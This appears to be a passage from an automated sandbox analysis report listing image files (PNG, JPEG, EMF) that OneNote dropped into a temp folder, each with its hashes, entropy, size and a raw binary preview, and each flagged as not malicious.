                                                                                                                                            Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{920AC299-7D42-4100-8DC3-EAFC9255DF87}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2332
                                                                                                                                            Entropy (8bit):7.8822150338370776
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                            MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                            SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                            SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                            SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{92152519-36B7-4E23-A0FB-3577E3173BC9}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2210
                                                                                                                                            Entropy (8bit):7.86853667196985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                            MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                            SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                            SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                            SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{94F7B0B3-D5D1-4B37-957F-12ADB5721FDA}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4081
                                                                                                                                            Entropy (8bit):7.943373267196131
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                            MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                            SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                            SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                            SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{95DF3041-B6E6-430B-9962-548691F78268}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2210
                                                                                                                                            Entropy (8bit):7.86853667196985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                            MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                            SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                            SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                            SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{960A20C2-9C2C-414A-BBD0-6855FC68E218}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22634
                                                                                                                                            Entropy (8bit):7.974332204835705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                            MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                            SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                            SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                            SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{964C907F-0AB1-4821-94C9-790F610ED6EC}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2599
                                                                                                                                            Entropy (8bit):7.903700862190034
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                            MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                            SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                            SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                            SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{96AA6619-8D4E-434D-947F-57B413D35045}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4490
                                                                                                                                            Entropy (8bit):7.928016176674318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                            MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                            SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                            SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                            SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{96B7B144-F189-4A5E-A30F-764B01F435EC}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14177
                                                                                                                                            Entropy (8bit):5.705782002886174
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                                                            MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                                                            SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                                                            SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                                                            SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{96E43486-B32F-4267-9939-8D12E3FEE91D}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):239
                                                                                                                                            Entropy (8bit):6.541057503179854
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:6v/lhPKLMRFj+8y6aoBRQcXgTxmRZnh80Ij3Xcnup:6v/7iQE6fwTsOWc
                                                                                                                                            MD5:088833D5A4FDCD105A34657922326F76
                                                                                                                                            SHA1:2A85EAA5121E27D6AA8F9D0C9D4C50620126D04A
                                                                                                                                            SHA-256:F3148B2CF70D225A76261E270E734F55D484D9ECF00B2DBD052D52FE40BD636C
                                                                                                                                            SHA-512:B988C05CB0192EF03603D002AEAA790016768039ED3177932E5CB2BBAD988E6EBD83B2DB9D4A2F0761FDFFA49EE28C8DD4494CEA77DFAC1BFB58DC1DADFDEF91
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.Q.. ..m's7.h.d.....C..1.. ........H..s..@.t....... ....E...@..n......)*D.z.}..v..P]..J._.:Q.Ft..........,.E...."P..@.X.'..`f.....e3/..]'$..qK7.....IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{96FF7773-4E08-4D53-A3DD-2FCD81C5D77E}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33032
                                                                                                                                            Entropy (8bit):2.941351060644542
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
                                                                                                                                            MD5:ACF4A9F470281F475EA45E113E9FB009
                                                                                                                                            SHA1:B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
                                                                                                                                            SHA-256:5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
                                                                                                                                            SHA-512:998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{98C3CA91-5597-4608-A526-5C65992A2077}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13030
                                                                                                                                            Entropy (8bit):7.948664903731204
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                            MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                            SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                            SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                            SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{99B1E814-32DE-4960-83B8-19D47C701577}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 88 x 574, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19920
                                                                                                                                            Entropy (8bit):7.987696084459766
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
                                                                                                                                            MD5:1BDAD9B3B6DE549162F9567697389E1C
                                                                                                                                            SHA1:5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
                                                                                                                                            SHA-256:0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
                                                                                                                                            SHA-512:475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{99D614BE-0B87-4D72-8FC9-6E08A02F3EBE}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13737
                                                                                                                                            Entropy (8bit):7.916899917415529
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                            MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                            SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                            SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                            SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                            Malicious:false
